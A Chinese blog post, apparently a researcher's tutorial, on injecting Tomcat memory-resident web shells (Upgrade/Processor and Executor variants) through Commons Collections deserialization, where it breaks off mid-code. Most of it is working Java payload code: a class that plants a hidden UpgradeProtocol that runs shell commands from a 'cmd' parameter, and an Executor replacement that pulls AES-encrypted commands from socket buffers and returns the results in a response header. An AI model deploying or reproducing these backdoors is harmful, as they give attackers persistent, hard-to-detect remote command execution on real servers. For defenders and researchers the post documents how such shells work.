CC注入Tomcat Upgrade/Executor/WebSocket内存马

最新推荐文章于 2025-04-24 14:51:03 发布
最新推荐文章于 2025-04-24 14:51:03 发布
阅读量711 收藏 28
点赞数 14
文章标签: 信息安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83799022/article/details/147396947
版权

学习一下Tomcat中和组件内存马不一样的马。除了学习注入原理外,其payload还在一些缩短payload的场景有应用,比如shiro

CC注入Tomcat Upgrade/Executor/WebSocket内存马

漏洞所用环境及测试全部代码https://github.com/godownio/TomcatMemshell

漏洞路由为yourip:8080/TomcatMemshell_war_exploded/Vuln

Upgrade内存马

反向代理(Reverse Proxy)是一种服务器,它站在客户端和目标服务器之间代表客户端向目标服务器发起请求,然后把服务器的响应返回给客户端

你看不到背后的服务器,甚至都不知道它有多少台,或者地址是什么。

在有反向代理的情况下,植入需要新映射url的servlet、controller内存马因为没有在反向代理中配置的原因,会无法找到对应路径。又或者是在当前路径访问的Filter、Listener、valve可能因为原有Filter的原因注入失败。而且新加组件的动静非常大。通用回显严格说来不算内存马,每次都需要打一次payload,只能说是一种回显方式,并没有做持久化。blue0师傅发现在Processor中也存在一种可以利用的内存马

随便找个servlet项目在doGet or doPost打上断点

Http11Processor.service()内调用了isConnectionToken,判断header里有没有Connection:upgrade的请求头;

如果有的话取出Upgrade请求头对应的对象名,然后getUpgradeProtocol取出UpgradeProtocol。然后调用该对象的accept方法

什么意思呢?就是如下请求头,会调用protocol.getUpgradeProtocol取出test这个UpgradeProtocol

Connection: upgrade
Upgrade: test

看到getUpgradeProtocol方法,从httpUpgradeProtocols中取出对象

接下来寻找在哪初始化的httpUpgradeProtocols,如果在Tomcat启动时初始化,那么就可以进行修改,如果在一次请求中初始化,则理论上每次请求都不一样,就不能注入内存马

在configureUpgradeProtocol方法内向httpUpgradeProtocols内put了upgradeProtocol,且将其name作为键名

通过查找用法configureUpgradeProtocol仅在AbstractHttp11Protocol.init内调用

通过在该方法打上断点,发现在Tomcat初始化时通过如下调用栈调用:

且初始upgradeProtocols为空,给我们注入留下了比较稳定的空间

  1. 恶意代码应该写在哪?

上文提到了,获取了UpgradeProtocol后,会去主动调用accept方法,且参数request是org.apache.coyote.Request。则写入一个恶意UpgradeProtocol,accept内为恶意代码

  1. 如何获取httpUpgradeProtocols?

通过request能获取到Http11NioProtocol,这是AbstractHttp11Protocol的子类,能获取到httpUpgradeProtocols

RequestFacade.request.connector.protocolHandler.httpUpgradeProtocols

然后是payload:

  • 如果是js环境推荐直接从request中获取
RequestFacade rf = (RequestFacade) request;
Field requestField = RequestFacade.class.getDeclaredField("request");
requestField.setAccessible(true);
Request request1 = (Request) requestField.get(rf);

Field connector = Request.class.getDeclaredField("connector");
connector.setAccessible(true);
Connector realConnector = (Connector) connector.get(request1);

Field protocolHandlerField = Connector.class.getDeclaredField("protocolHandler");
protocolHandlerField.setAccessible(true);
AbstractHttp11Protocol handler = (AbstractHttp11Protocol) protocolHandlerField.get(realConnector);

HashMap<String, UpgradeProtocol> upgradeProtocols = null;
Field upgradeProtocolsField = AbstractHttp11Protocol.class.getDeclaredField("httpUpgradeProtocols");
upgradeProtocolsField.setAccessible(true);
upgradeProtocols = (HashMap<String, UpgradeProtocol>) upgradeProtocolsField.get(handler);

并不能从StandardContext中获取到request,StandardContext 是容器结构,而 Request 是运行时结构

需要用到通用回显的方式获取到request

给一个Latch1通过全局global获取request姿势拼接的Upgrade内存马:

package org.example.tomcatmemshell.Upgrade;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.Context;
import org.apache.catalina.WebResourceRoot;
import org.apache.catalina.connector.Connector;
import org.apache.catalina.connector.Response;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.coyote.Adapter;
import org.apache.coyote.Processor;
import org.apache.coyote.Request;
import org.apache.coyote.UpgradeProtocol;
import org.apache.coyote.http11.AbstractHttp11Protocol;
import org.apache.coyote.http11.upgrade.InternalHttpUpgradeHandler;
import org.apache.tomcat.util.net.SocketWrapperBase;

import java.lang.reflect.Field;
import java.util.HashMap;

public class UpgradeMemShell extends AbstractTranslet implements UpgradeProtocol{
    static {
        try {

            //获取WebappClassLoaderBase
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            Field webappclassLoaderBaseField=Class.forName("org.apache.catalina.loader.WebappClassLoaderBase").getDeclaredField("resources");
            webappclassLoaderBaseField.setAccessible(true);
            WebResourceRoot resources=(WebResourceRoot) webappclassLoaderBaseField.get(webappClassLoaderBase);
            Context StandardContext =  resources.getContext();

            //获取ApplicationContext
            java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
            contextField.setAccessible(true);
            org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(StandardContext);

            //获取StandardService
            java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
            serviceField.setAccessible(true);
            org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);

            //获取Connector
            org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();

            //找到指定的Connector
            for (int i = 0; i < connectors.length; i++) {
                if (connectors[i].getScheme().contains("http")) {
                    //获取protocolHandler、connectionHandler
                    org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();
                    java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler", null);
                    getHandlerMethod.setAccessible(true);
                    org.apache.tomcat.util.net.AbstractEndpoint.Handler connectionHandler = (org.apache.tomcat.util.net.AbstractEndpoint.Handler) getHandlerMethod.invoke(protocolHandler, null);

                    //获取RequestGroupInfo
                    java.lang.reflect.Field globalField = Class.forName("org.apache.coyote.AbstractProtocol$ConnectionHandler").getDeclaredField("global");
                    globalField.setAccessible(true);
                    org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(connectionHandler);

                    //获取RequestGroupInfo中储存了RequestInfo的processors
                    java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");
                    processorsField.setAccessible(true);
                    java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);
                    for (int k = 0; k < list.size(); k++) {
                        org.apache.coyote.RequestInfo requestInfo = (org.apache.coyote.RequestInfo) list.get(k);
                        //获取request
                        java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");
                        requestField.setAccessible(true);
                        org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(requestInfo);
                        org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) tempRequest.getNote(1);
                        Field connectorField = org.apache.catalina.connector.Request.class.getDeclaredField("connector");
                        connectorField.setAccessible(true);
                        Connector connector = (Connector) connectorField.get(request);

                        Field protocolHandlerField = Connector.class.getDeclaredField("protocolHandler");
                        protocolHandlerField.setAccessible(true);
                        AbstractHttp11Protocol handler = (AbstractHttp11Protocol) protocolHandlerField.get(connector);

                        HashMap<String, UpgradeProtocol> upgradeProtocols = null;
                        Field upgradeProtocolsField = AbstractHttp11Protocol.class.getDeclaredField("httpUpgradeProtocols");
                        upgradeProtocolsField.setAccessible(true);
                        upgradeProtocols = (HashMap<String, UpgradeProtocol>) upgradeProtocolsField.get(handler);
                        upgradeProtocols.put("UpgradeMemShell",new UpgradeMemShell());
                        upgradeProtocolsField.set(handler,upgradeProtocols);
                        break;
                    }
                    break;
                }
            }
        }
        catch (Exception e) {
        }
    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
    @Override
    public String getHttpUpgradeName(boolean isSSLEnabled) {
        return null;
    }

    @Override
    public byte[] getAlpnIdentifier() {
        return new byte[0];
    }

    @Override
    public String getAlpnName() {
        return null;
    }

    @Override
    public Processor getProcessor(SocketWrapperBase<?> socketWrapper, Adapter adapter) {
        return null;
    }

    @Override
    public InternalHttpUpgradeHandler getInternalUpgradeHandler(Adapter adapter, Request request) {
        return null;
    }

    @Override
    public boolean accept(Request request) {
        org.apache.catalina.connector.Request Realrequest = (org.apache.catalina.connector.Request) request.getNote(1);
        Response response = Realrequest.getResponse();
        System.out.println(
                "TomcatShellInject Upgrade accept.....................................................................");
        String cmdParamName = "cmd";
        String cmd;
        try {
            if ((cmd = Realrequest.getParameter(cmdParamName)) != null) {
                Process process = Runtime.getRuntime().exec(cmd);
                java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
                        new java.io.InputStreamReader(process.getInputStream()));
                StringBuilder stringBuilder = new StringBuilder();
                String line;
                while ((line = bufferedReader.readLine()) != null) {
                    stringBuilder.append(line + '\n');
                }
                response.getOutputStream().write(stringBuilder.toString().getBytes());
                response.getOutputStream().flush();
                response.getOutputStream().close();
            }
        }catch (Exception e){
            e.printStackTrace();
        }
        return true;
    }
}

注意执行命令需要带上Connection: Upgrade和Upgrade请求头

Executor内存马(不稳定,复现失败)

上面的Upgrade马实际上作用于下图connector内的Http11Processor,实际上还有更靠前的位置可以注入内存马。但是靠前的位置带给了这种内存马极其不稳定回显的局限性

还是可以学习一下,因为说不定就找到了稳定的回显,这种Executor马又具有常规组件查杀工具查杀不到的性质,未来可期呢。

图上Endpoint属于Http11Protocol的一部分,实际Http11Protocol在Tomcat高版本处弃用状态,实际使用的是Http11NioProtocol

Endpoint

Endpoint 是 ProtocolHandler 中用来监听端口、接收连接、分发 socket 给 Processor 处理的组件。

  • NioEndpoint:基于 Java NIO 的非阻塞实现
  • AprEndpoint:基于 APR 的 native 实现
  • JIoEndpoint:老的基于传统 BIO 的实现

你可以把它当作一个“Socket Server”,它主要负责:

Processor

Processor才是真正处理请求的逻辑,比如 Http11Processor:

  • 解析 HTTP 请求
  • 封装成 Request / Response
  • 调用 servlet 容器(Engine → Host → Context → Wrapper)

HTTP请求到来,Tomcat处理的简化流程如下:

  1. Connector 初始化并创建 ProtocolHandler
  2. ProtocolHandler 持有一个 Endpoint(如 NioEndpoint)
  3. NioEndpoint 启动并监听端口
  4. 来一个连接后:
    • NioEndpoint 分配线程处理连接
    • 调用 Processor(如 Http11Processor)来解析和响应请求

上面的Upgrade内存马,实际上也可以被称作Processor内存马

下面我们详细解释一下上面提到的Endpoint

Endpoint

Acceptor

Acceptor属于Endpoint的一部分

Tomcat 启动后,每个 Connector 会对应一个 Endpoint,Endpoint 会启动一个 Acceptor 线程

调用 ServerSocketChannel.accept() 等方法接受客户端连接

将 Socket 通知给 Poller / Worker 线程(由线程池处理请求)

NIO 模型下,不是每个连接对应一个线程,而是将连接注册到 Selector 上。

Poller 就是维护 Selector 的线程,不断轮询:“哪个连接有数据要读?”

Poller的主要工作如下,很好理解:

  • 注册 SocketChannel 到 Selector
  • 在 Selector.select() 时发现连接有数据可读
  • 将“有数据可读的连接”放到工作队列中,交给 Worker 来处理
Executor

似乎Endpoint有Acceptor就足够分发请求到Processor了,那Executor在整个处理过程中有什么作用呢?

默认每个 Connector 的 Endpoint 会自己创建一个线程池来处理 Socket 连接;如果有多个 Connector(比如 HTTP + AJP),那就是多个线程池,不容易统一配置和管理;引入 Executor 后,就可以在多个 Connector 之间共享线程池。

如果配置了Executor,Endpoint(比如 NioEndpoint)的线程池不再自己 new,而是用这个共享的 Executor

从一个请求到达Tomcat的栈图可以验证以上理论

其中Poller不属于Executor,worker属于Executor

那么调用到Executor的地方一定是在Poller中,我们来调试一下

调试分析

断点先打在NioEndpoint$Poller.Poller(),Poller构造函数新建了WindowsSelectorImpl作为selector

请求到来时,断点打在NioEndpoint$Poller.run(),调用了processKey()

processKey内调用了processSocket。该方法用于处理 SelectionKey 的读写事件,优先处理读事件,若失败则关闭连接;接着处理写事件,若失败也关闭连接。若存在发送文件数据,则直接处理文件发送。

跟进到processSocket,调用了getExecutor获取executor,然后调用了对应的execute方法

没有Executor配置的情况下,默认是取出ThreadPoolExecutor

org.apache.tomcat.util.threads.ThreadPoolExecutor实现自java.util.concurrent.ThreadPoolExecutor,那自定义的executor也实现这个类下的接口Executor,然后重写execute为回显代码

注入点

在哪注入Executor?

调用到getExecutor的栈如下:

getExecutor方法属于AbstractEndpoint,很明显getExecutor可以通过NioEndpoint去触发,变量也是存在NioEndpoint中

能通过NioEndpoint去调用setExecutor,可以看到设置了Executor并把内置的executor置为空,这样就不会调用到上述的默认ThreadPoolExecutor了

现在的目标是找到NioEndpoint

用java-object-searcher可以找到

利用java-object-searcher构造Tomcat线程回显 | Godown_blog

List<Keyword> keys = new ArrayList<>();
keys.add(new Keyword.Builder().setField_type("NioEndpoint").build());
//定义黑名单
List<Blacklist> blacklists = new ArrayList<>();
blacklists.add(new Blacklist.Builder().setField_type("java.io.File").build());
//新建一个广度优先搜索Thread.currentThread()的搜索器
SearchRequstByBFS searcher = new SearchRequstByBFS(Thread.currentThread(),keys);
// 设置黑名单
searcher.setBlacklists(blacklists);
//打开调试模式,会生成log日志
searcher.setIs_debug(true);
//挖掘深度为20
searcher.setMax_search_depth(20);
//设置报告保存位置
searcher.setReport_save_path("D:\\");
searcher.searchObject();

搜索的结果如下

#############################################################
   Java Object Searcher v0.01
   author: c0ny1<root@gv7.me>
   github: http://github.com/c0ny1/java-object-searcher
#############################################################


TargetObject = {org.apache.tomcat.util.threads.TaskThread} 
  ---> group = {java.lang.ThreadGroup} 
   ---> threads = {class [Ljava.lang.Thread;} 
    ---> [14] = {java.lang.Thread} 
     ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}


TargetObject = {org.apache.tomcat.util.threads.TaskThread} 
  ---> group = {java.lang.ThreadGroup} 
   ---> threads = {class [Ljava.lang.Thread;} 
    ---> [15] = {java.lang.Thread} 
     ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}


TargetObject = {org.apache.tomcat.util.threads.TaskThread} 
  ---> group = {java.lang.ThreadGroup} 
   ---> threads = {class [Ljava.lang.Thread;} 
    ---> [16] = {java.lang.Thread} 
     ---> target = {org.apache.tomcat.util.net.NioEndpoint$Acceptor}


TargetObject = {org.apache.tomcat.util.threads.TaskThread} 
  ---> group = {java.lang.ThreadGroup} 
   ---> threads = {class [Ljava.lang.Thread;} 
    ---> [14] = {java.lang.Thread} 
     ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller} 
      ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}


TargetObject = {org.apache.tomcat.util.threads.TaskThread} 
  ---> group = {java.lang.ThreadGroup} 
   ---> threads = {class [Ljava.lang.Thread;} 
    ---> [14] = {java.lang.Thread} 
     ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller} 
      ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint} 
       ---> eventCache = {org.apache.tomcat.util.collections.SynchronizedStack} 
        ---> stack = {class [Ljava.lang.Object;} 
         ---> [0] = {org.apache.tomcat.util.net.NioEndpoint$PollerEvent}


TargetObject = {org.apache.tomcat.util.threads.TaskThread} 
  ---> group = {java.lang.ThreadGroup} 
   ---> threads = {class [Ljava.lang.Thread;} 
    ---> [14] = {java.lang.Thread} 
     ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller} 
      ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint} 
         ---> processorCache = {org.apache.tomcat.util.collections.SynchronizedStack} 
          ---> stack = {class [Ljava.lang.Object;} 
           ---> [0] = {org.apache.tomcat.util.net.NioEndpoint$SocketProcessor}


TargetObject = {org.apache.tomcat.util.threads.TaskThread} 
  ---> group = {java.lang.ThreadGroup} 
   ---> threads = {class [Ljava.lang.Thread;} 
    ---> [15] = {java.lang.Thread} 
     ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller} 
      ---> selector = {sun.nio.ch.WindowsSelectorImpl} 
       ---> channelArray = {class [Lsun.nio.ch.SelectionKeyImpl;} 
        ---> [1] = {sun.nio.ch.SelectionKeyImpl} 
         ---> attachment = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}


TargetObject = {org.apache.tomcat.util.threads.TaskThread} 
  ---> group = {java.lang.ThreadGroup} 
   ---> threads = {class [Ljava.lang.Thread;} 
    ---> [14] = {java.lang.Thread} 
     ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller} 
      ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint} 
       ---> nioChannels = {org.apache.tomcat.util.collections.SynchronizedStack} 
        ---> stack = {class [Ljava.lang.Object;} 
         ---> [0] = {org.apache.tomcat.util.net.NioChannel} 
          ---> socketWrapper = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}

链子肯定是选下面这条

TargetObject = {org.apache.tomcat.util.threads.TaskThread} 
  ---> group = {java.lang.ThreadGroup} 
   ---> threads = {class [Ljava.lang.Thread;} 
    ---> [14] = {java.lang.Thread} 
     ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller} 
      ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}

注意,并不是每次都在[14]的位置存在NioEndpoint$Poller,可以确定的是Thread名包含ClientPoller的肯定会存在NioEndpoint$Poller。为了避免歧义,一定要固定好ClientPoller-0或者ClientPoller-1

目前的整体框架:

package org.example.tomcatmemshell.Executor;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.coyote.Request;
import org.apache.coyote.RequestGroupInfo;
import org.apache.coyote.RequestInfo;
import org.apache.tomcat.util.net.AbstractEndpoint;
import org.apache.tomcat.util.net.NioEndpoint;

import java.lang.reflect.Field;
import java.util.concurrent.Executor;

public class ExecutorMemShell extends AbstractTranslet implements Executor {
    static {
        try{
            String pass = "cmd";
            Thread TaskThread = Thread.currentThread();
            ThreadGroup threadGroup = TaskThread.getThreadGroup();
            Thread[] threads = (Thread[]) getClassField(ThreadGroup.class,threadGroup,"threads");
            for(Thread thread:threads) {
                if (thread.getName().contains("http-nio") && thread.getName().contains("ClientPoller-1")) {
                    Object target = getClassField(Thread.class, thread, "target");
                    NioEndpoint this0 = (NioEndpoint) getClassField(Class.forName("org.apache.tomcat.util.net.NioEndpoint$Acceptor"), target, "this$0");
                    this0.setExecutor(new ExecutorMemShell());
                    break;
                }
            }
        }catch (Exception e){
            e.printStackTrace();
        }
    }
    public static Object getClassField(Class clazz,Object object, String fieldName) throws NoSuchFieldException, IllegalAccessException {
        Field field = clazz.getDeclaredField(fieldName);
        field.setAccessible(true);
        Object var =  field.get(object);
        return var;
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    @Override
    public void execute(Runnable command) {
        System.out.println("testing");
    }
}

回显

重写的execute参数只有command,没有以往组件内存马自带的request作为参数,如何回显?

executor可以打通用回显吗?

答案是不能,因为请求到达Executor时,如上文所说,还没有进行Processor处理,取到了request,但是request里没东西

下图是我打入内存马后用?cmd=ipconfig测试,结果request为R(null)的例子

executor内存马中,就不能想着去取request进行回显了

这个内存马的发现者肯定找到了办法进行回显的

网上很火的一种方式是找Channel,消息没有读取出来,肯定是在channel里

按照如下变量栈,可以找到请求:

command.socketWrapper.socket.appReadBufHandler.byteBuffer.hb

不过获取的请求是byte形式,转为String后也无法直接作为request,不过可以利用固定的分割作为匹配

比如使用自定义的Header,并将显著标志作为字符串结尾,如cmd:whoami\r

问题1

但是我们来分析一下:

最开始执行到ThreadPoolExecutor.executor内appReadBufHandler是空的,注意!此时已经到Executor内了,意味着我们自定义的Executor也会和这个一样appReadBufHandler为空。

Executor发给Worker处理后,初始化Http11InputBuffer才会调用到setAppReadBufHandler进行处理!所以以上读取requestString的方式是错的

如果有appReadBufHandler,那是上一次请求的缓存。比如先打一个注册Executor内存马,那想执行到execute时,appReadBufHandler中不是带命令的request,而是上一次注册Executor的请求,如果你在注册Executor请求中就带上cmd:xxx\r,那就能执行命令,这也是众多文章说此方法不稳定的原因

问题2

如果制作的类如下,修改了executor会导致后面的诸多正常请求无法完成分发,导致Tomcat出现错误

正常的业务极有可能被直接打崩

当然,如果继承ThreadPoolExecutor正常业务就能顺利运行,但是就无法继承AbstractTranslet了,应用面会比较窄,所以作者给出的都是JSP的代码

回显构造(不稳定)

我的思路是自定义defineClass去加载恶意Executor,但是触发方式依旧是极不稳定

作者给出的第二版代码https://xz.aliyun.com/news/11059

甚至触发稳定性不如第一版,-.-

给一个第二版代码,definClass后是能成功触发到executor的getRequest的,只是取request大概率为空导致复现失败。加载字节码的思路是没错的

注意!defineClass加载字节码所用的ClassLoader必须是Tomcat的WebappClassLoader,只有这个类加载器加载的字节码才能使用Tomcat的类,比如org.apache.tomcat.util.threads.ThreadPoolExecutor,否则会报java.lang.NoClassDefFoundError: org/apache/tomcat/util/threads/ThreadPoolExecutor

恶意Executor:生成Base64放到代码2

package org.example.tomcatmemshell.Executor;

import org.apache.catalina.connector.Response;
import org.apache.coyote.RequestInfo;
import org.apache.tomcat.util.net.NioEndpoint;
import org.apache.tomcat.util.threads.ThreadPoolExecutor;

import java.io.IOException;
import java.lang.reflect.Field;
import java.nio.ByteBuffer;
import java.nio.channels.SelectionKey;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Base64;
import java.util.LinkedList;
import java.util.concurrent.BlockingQueue;
import java.util.concurrent.RejectedExecutionHandler;
import java.util.concurrent.ThreadFactory;
import java.util.concurrent.TimeUnit;

public class ThreadExecutor extends ThreadPoolExecutor {
    public static void main(String[] args) throws IOException {
        byte[] string = Base64.getEncoder().encode(Files.readAllBytes(Paths.get("target/classes/org/example/tomcatmemshell/Executor/ThreadExecutor.class")));
        System.out.println(new String(string));
    }
    public static final String DEFAULT_SECRET_KEY = "blueblueblueblue";
    private static final String AES = "AES";
    private static final byte[] KEY_VI = "blueblueblueblue".getBytes();
    private static final String CIPHER_ALGORITHM = "AES/CBC/PKCS5Padding";
    private static java.util.Base64.Encoder base64Encoder = java.util.Base64.getEncoder();
    private static java.util.Base64.Decoder base64Decoder = java.util.Base64.getDecoder();

    public ThreadExecutor(int corePoolSize, int maximumPoolSize, long keepAliveTime, TimeUnit unit, BlockingQueue<Runnable> workQueue, ThreadFactory threadFactory, RejectedExecutionHandler handler) {
        super(corePoolSize, maximumPoolSize, keepAliveTime, unit, workQueue, threadFactory, handler);
    }

    public String getRequest2() throws NoSuchFieldException, IllegalAccessException {
        Thread TaskThread = Thread.currentThread();
        ThreadGroup threadGroup = TaskThread.getThreadGroup();
        Thread[] threads1 = (Thread[]) getClassField(ThreadGroup.class, threadGroup, "threads");

        for (Thread thread : threads1) {
            String threadName = thread.getName();
            if (threadName.contains("Client")) {
                Object target = getField(thread, "target");
                if (target instanceof Runnable) {
                    try {
                        byte[] bytes = new byte[8192];
                        ByteBuffer buf = ByteBuffer.wrap(bytes);
                        try {
                            LinkedList linkedList = (LinkedList) getField(getField(getField(target, "selector"), "kqueueWrapper"), "updateList");
                            for (Object obj : linkedList) {
                                try {
                                    SelectionKey[] selectionKeys = (SelectionKey[]) getField(getField(obj, "channel"), "keys");

                                    for (Object tmp : selectionKeys) {
                                        try {
                                            NioEndpoint.NioSocketWrapper nioSocketWrapper = (NioEndpoint.NioSocketWrapper) getField(tmp, "attachment");
                                            try {
                                                nioSocketWrapper.read(false, buf);
                                                String a = new String(buf.array(), "UTF-8");
                                                if (a.indexOf("blue0") > -1) {
                                                    System.out.println(a.indexOf("blue0"));
                                                    System.out.println(a.indexOf("\r", a.indexOf("blue0")));
                                                    String b = a.substring(a.indexOf("blue0") + "blue0".length() + 2, a.indexOf("\r", a.indexOf("blue0")));
                                                    b = decode(DEFAULT_SECRET_KEY, b);
                                                    buf.position(0);
                                                    nioSocketWrapper.unRead(buf);
                                                    System.out.println(b);
                                                    System.out.println(new String(buf.array(), "UTF-8"));
                                                    return b;
                                                } else {
                                                    buf.position(0);
                                                    nioSocketWrapper.unRead(buf);
                                                    continue;
                                                }
                                            } catch (Exception e) {
                                                nioSocketWrapper.unRead(buf);
                                            }
                                        } catch (Exception e) {
                                            continue;
                                        }
                                    }
                                } catch (Exception e) {
                                    continue;
                                }
                            }
                        } catch (Exception var11) {
                            System.out.println(var11);
                            continue;
                        }

                    } catch (Exception ignored) {
                    }
                }

            }
        }


        return new String();
    }


    public void getResponse(byte[] res) {
        try {
            Thread[] threads = (Thread[]) ((Thread[]) getField(Thread.currentThread().getThreadGroup(), "threads"));

            for (Thread thread : threads) {
                if (thread != null) {
                    String threadName = thread.getName();
                    if (!threadName.contains("exec") && threadName.contains("Acceptor")) {
                        Object target = getField(thread, "target");
                        if (target instanceof Runnable) {
                            try {
                                ArrayList objects = (ArrayList) getField(getField(getField(getField(target, "this$0"), "handler"), "global"), "processors");
                                for (Object tmp_object : objects) {
                                    RequestInfo request = (RequestInfo) tmp_object;
                                    Response response = (Response) getField(getField(request, "req"), "response");
                                    response.addHeader("Server-token", encode(DEFAULT_SECRET_KEY, new String(res, "UTF-8")));

                                }
                            } catch (Exception var11) {
                                continue;
                            }

                        }
                    }
                }
            }
        } catch (Exception ignored) {
        }
    }


    @Override
    public void execute(Runnable command) {
//            System.out.println("123");

        String cmd = null;
        try {
            cmd = getRequest2();
        } catch (NoSuchFieldException e) {
            throw new RuntimeException(e);
        } catch (IllegalAccessException e) {
            throw new RuntimeException(e);
        }
        if (cmd.length() > 1) {
            try {
                Runtime rt = Runtime.getRuntime();
                Process process = rt.exec(cmd);
                java.io.InputStream in = process.getInputStream();

                java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
                java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
                String s = "";
                String tmp = "";
                while ((tmp = stdInput.readLine()) != null) {
                    s += tmp;
                }
                if (s != "") {
                    byte[] res = s.getBytes(StandardCharsets.UTF_8);
                    getResponse(res);
                }


            } catch (IOException e) {
                e.printStackTrace();
            }
        }


        this.execute(command, 0L, TimeUnit.MILLISECONDS);
    }
    public Object getField(Object object, String fieldName) {
        Field declaredField;
        Class clazz = object.getClass();
        while (clazz != Object.class) {
            try {

                declaredField = clazz.getDeclaredField(fieldName);
                declaredField.setAccessible(true);
                return declaredField.get(object);
            } catch (NoSuchFieldException | IllegalAccessException e) {
            }
            clazz = clazz.getSuperclass();
        }
        return null;
    }

    public static String decode(String key, String content) {
        try {
            javax.crypto.SecretKey secretKey = new javax.crypto.spec.SecretKeySpec(key.getBytes(), AES);
            javax.crypto.Cipher cipher = javax.crypto.Cipher.getInstance(CIPHER_ALGORITHM);
            cipher.init(javax.crypto.Cipher.DECRYPT_MODE, secretKey, new javax.crypto.spec.IvParameterSpec(KEY_VI));

            byte[] byteContent = base64Decoder.decode(content);
            byte[] byteDecode = cipher.doFinal(byteContent);
            return new String(byteDecode, java.nio.charset.StandardCharsets.UTF_8);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return null;
    }

    public static String encode(String key, String content) {
        try {
            javax.crypto.SecretKey secretKey = new javax.crypto.spec.SecretKeySpec(key.getBytes(), AES);
            javax.crypto.Cipher cipher = javax.crypto.Cipher.getInstance(CIPHER_ALGORITHM);
            cipher.init(javax.crypto.Cipher.ENCRYPT_MODE, secretKey, new javax.crypto.spec.IvParameterSpec(KEY_VI));
            byte[] byteEncode = content.getBytes(java.nio.charset.StandardCharsets.UTF_8);
            byte[] byteAES = cipher.doFinal(byteEncode);
            return base64Encoder.encodeToString(byteAES);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return null;
    }
    public static Object getClassField(Class clazz,Object object, String fieldName) throws NoSuchFieldException, IllegalAccessException {
        Field field = clazz.getDeclaredField(fieldName);
        field.setAccessible(true);
        Object var =  field.get(object);
        return var;
    }
}

ExecutorMemShell:

package org.example.tomcatmemshell.Executor;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.tomcat.util.net.NioEndpoint;

import java.util.Base64;
import java.util.concurrent.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;

//复现失败,不推荐使用

public class ExecutorMemShell extends AbstractTranslet{

    public ExecutorMemShell() {
        try{
            Thread TaskThread = Thread.currentThread();
            ThreadGroup threadGroup = TaskThread.getThreadGroup();
            Thread[] threads = (Thread[]) getClassField(ThreadGroup.class,threadGroup,"threads");
            for(Thread thread:threads) {
                if (thread.getName().contains("http-nio") && thread.getName().contains("ClientPoller-1")) {
                    Object target = getClassField(Thread.class, thread, "target");
                    NioEndpoint this0 = (NioEndpoint) getClassField(Class.forName("org.apache.tomcat.util.net.NioEndpoint$Poller"), target, "this$0");
                    try {
